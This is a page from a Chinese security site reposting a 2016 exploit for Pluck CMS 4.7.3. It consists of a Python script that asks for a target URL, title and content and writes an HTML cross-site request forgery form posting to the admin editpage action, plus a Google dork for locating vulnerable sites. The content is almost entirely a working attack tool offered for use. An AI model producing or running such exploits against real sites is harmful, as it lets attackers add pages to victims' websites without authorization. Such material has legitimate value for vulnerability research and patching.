首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Pluck CMS 4.7.3 - Cross-Site Request Forgery (Add Page) 来源：www.ahsan-tahir.com 作者：Tahir 发布时间：2016-10-19   # Exploit Title: Pluck CMS 4.7.3 - Add-Page Cross-Site Request Forgery # Exploit Author: Ahsan Tahir # Date: 18-10-2016 # Software Link: http://www.pluck-cms.org/?file=download # Vendor: http://www.pluck-cms.org/ # Google Dork: "2005-2016. pluck is available" # Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial # Website: www.ahsan-tahir.com # Category: webapps # Version: 4.7.3 # Tested on: [Kali Linux 2.0 | Windows 8.1] # Email: mrahsan1337@gmail.com   import os import urllib   if os.name == 'nt':         os.system('cls') else:     os.system('clear')   def csrfexploit():       banner = '''     +-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==+     |  ____  _            _       ____ __  __ ____   |     | |  _ \| |_   _  ___| | __  / ___|  \/  / ___|  |     | | |_) | | | | |/ __| |/ / | |   | |\/| \___ \  |     | |  __/| | |_| | (__|   <  | |___| |  | |___) | |     | |_|   |_|\__,_|\___|_|\_\  \____|_|  |_|____/  |     |  //PluckCMS 4.7.3 Add-Post CSRF Auto-Exploiter |     |  > Exploit Author & Script Coder: Ahsan Tahir  |     +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+     '''     print banner       url = str(raw_input(" [+] Enter The Target URL (Please include http:// or https://): "))     title = str(raw_input(" [+] Enter the Title of the Post which you want to add by exploiting CSRF: "))     content = raw_input(" [+] Enter the Content, which you want to add in the post by exploiting CSRF: ")       csrfhtmlcode = '''     <html>       <!-- CSRF PoC -->       <body>         <form action="%s/admin.php?action=editpage" method="POST">           <input type="hidden" name="title" value="%s" />           <input type="hidden" name="seo&#95;name" value="" />           <input type="hidden" name="content" value="%s" />           <input type="hidden" name="description" value="" />           <input type="hidden" name="keywords" value="" />           <input type="hidden" name="hidden" value="no" />           <input type="hidden" name="sub&#95;page" value="" />           <input type="hidden" name="theme" value="default" />           <input type="hidden" name="save" value="Save" />           <input type="submit" value="Submit request" />         </form>       </body>     </html>     ''' %(url, title, content)       print " +----------------------------------------------------+\n [!] The HTML exploit code for exploiting this CSRF has been created."       print(" [!] Enter your Filename below\n Note: The exploit will be saved as 'filename'.html \n")     extension = ".html"     name = raw_input(" Filename: ")     filename = name+extension     file = open(filename, "w")       file.write(csrfhtmlcode)     file.close()     print(" [+] Your exploit is saved as %s")%filename     print("")   csrfexploit()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft Windows (x86) - 'afd ·LanSpy 2.0.0.155 - Local Buffe ·Microsoft Windows Diagnostics ·Cgiemail 1.6 - Source Code Dis ·Ruby on Rails - Dynamic Render ·Windows DeviceApi CMApi PiCMOp ·Firefox 49.0.1 - Denial of Ser ·Windows DeviceApi CMApi - User ·Ruby on Rails Dynamic Render F ·OpenNMS Java Object Unserializ ·VOX Music Player 2.8.8 - '.pls ·Hak5 WiFi Pineapple Preconfigu   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved